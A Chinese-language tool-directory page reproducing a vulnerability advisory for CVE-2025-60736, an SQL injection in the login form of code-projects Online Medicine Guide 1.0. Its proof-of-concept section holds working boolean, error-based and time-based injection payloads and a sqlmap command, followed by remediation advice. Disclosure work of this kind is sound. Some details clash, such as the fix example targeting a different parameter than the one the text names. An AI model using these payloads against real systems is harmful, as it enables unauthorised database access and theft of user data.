Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-60736 — code-projects Online Medicine Guide 1.0 存在 SQL 注入漏洞 | Kitploit
工具/GitHubGitHub/nxvh1337/cve-2025-60736
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubnxvh1337/cve-2025-60736

CVE-2025-60736

code-projects Online Medicine Guide 1.0 存在 SQL 注入漏洞

查看仓库
110个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-60736:在线药品指南中的SQL注入漏洞

执行摘要

本文档概述了在线药品指南Web应用程序中发现的一个严重SQL注入漏洞。该漏洞允许未经授权的数据库访问,对应用程序及其用户构成重大安全风险。

提交者

  • Noah "nxvh" Heraud

1. 产品信息

受影响产品

  • 产品名称:在线药品指南
  • 供应商:Code Projects
  • 供应商主页:https://code-projects.org/online-medicine-guide-in-php-css-javascript-and-mysql-free-download/
  • 受影响版本:v1.0
  • 易受攻击文件:/login.php
  • 软件类型:Web应用程序(PHP/MySQL)

技术细节

  • 编程语言:PHP
  • 数据库:MySQL
  • 前端:CSS、JavaScript
  • 架构:LAMP/WAMP技术栈

2. 漏洞详情

漏洞分类

  • CVE ID:CVE-2025-60736
  • 漏洞类型:SQL注入
  • 严重性:严重
  • CVSS评分:9.8(严重)
  • 攻击向量:网络
  • 攻击复杂度:低
  • 所需权限:无
  • 用户交互:无
  • 影响范围:已变更

根本原因分析

该漏洞源于/login.php文件中输入验证和清理不足。应用程序直接将upass参数中的用户输入拼接进SQL查询,而未进行适当的清理或使用预处理语句。

技术根本原因:

  • SQL查询中的直接字符串拼接
  • 缺乏输入验证和清理
  • 缺少预处理语句实现
  • 参数绑定不足

3. 概念验证

漏洞位置

  • 文件:/login.php
  • 参数:upass(POST)
  • 攻击向量:HTTP POST请求操纵

利用方法

方法1:基于布尔的SQL注入

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx

方法1:基于错误的SQL注入

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp

方法2:基于时间的盲SQL注入

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa

自动化测试

该漏洞已通过sqlmap确认:

root@kitploit:~
sqlmap -u "http://localhost:8000/login.php" --data="uname=admin&upass=test" -p upass --batch --dbs

漏洞利用证明

4. 修复计划

立即措施

  1. 紧急补丁:对upass参数实施输入验证
  2. 数据库监控:启用全面的可疑活动日志记录
  3. 访问限制:实施速率限制和基于IP的限制
  4. 安全审计:立即进行安全评估

5. 技术修复

代码修复示例

修复前(易受攻击):

root@kitploit:~
$query = "SELECT * FROM users WHERE username = '" . $_POST['uname'] . "'";

修复后(安全):

root@kitploit:~
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$_POST['uname']]);

安全最佳实践实施

  1. 预处理语句:仅使用参数化查询
  2. 输入验证:实施基于白名单的验证
  3. 输出编码:正确编码所有输出数据
  4. 错误处理:实施不泄露信息的安全错误处理
  5. 访问控制:实施适当的身份验证和授权

文档版本:1.0
最后更新:2025年10月3日(日/月/年)

下载工具